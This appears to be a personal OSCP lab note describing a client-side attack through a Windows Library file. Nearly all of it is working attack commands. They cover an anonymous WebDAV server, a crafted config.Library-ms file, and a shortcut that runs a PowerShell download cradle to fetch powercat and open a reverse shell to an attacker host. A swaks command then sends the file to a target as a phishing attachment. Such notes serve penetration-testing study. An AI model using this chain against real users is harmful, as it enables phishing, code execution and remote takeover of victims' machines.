🧪

Client Side Attacks Code Execution Via Windows Library

Notes from oscp.adot8.com — cool.

#cool#adot8
source · oscp.adot8.com · cool/client-side-attacks_code-execution-via-windows-library

Code execution via Windows Library

code
01gobuster dir -w ~/opt/wordlists/directories1.txt -u http://192.168.160.199 -x pdf,txt -t 100

Start up WebDav share

code
01wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/adot8/webdav/

Create a config.Library-ms file

code
01<?xml version="1.0" encoding="UTF-8"?>
02<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
03<name>@windows.storage.dll,-34582</name>
04<version>6</version>
05<isLibraryPinned>true</isLibraryPinned>
06<iconReference>imageres.dll,-1003</iconReference>
07<templateInfo>
08<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
09</templateInfo>
10<searchConnectorDescriptionList>
11<searchConnectorDescription>
12<isDefaultSaveLocation>true</isDefaultSaveLocation>
13<isSupported>false</isSupported>
14<simpleLocation>
15<url>http://192.168.45.173 </url>
16</simpleLocation>
17</searchConnectorDescription>
18</searchConnectorDescriptionList>
19</libraryDescription>

Create a new shortcut and name as automatic_configuration

code
01powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1');powercat -c 192.168.45.173 -p 1337 -e powershell"

Move the shortcut into the webdav root folder and get pretext to get the user to open it

Send email

swaks --to bob@adot8.com --from maildmz@relia.com --header 'Subject: Bad email!' --body "I've attached the problematic mail." --server 192.168.166.189 --attach @config.Library-ms --auth-user 'john@adot8.com' --auth-password 'abc123'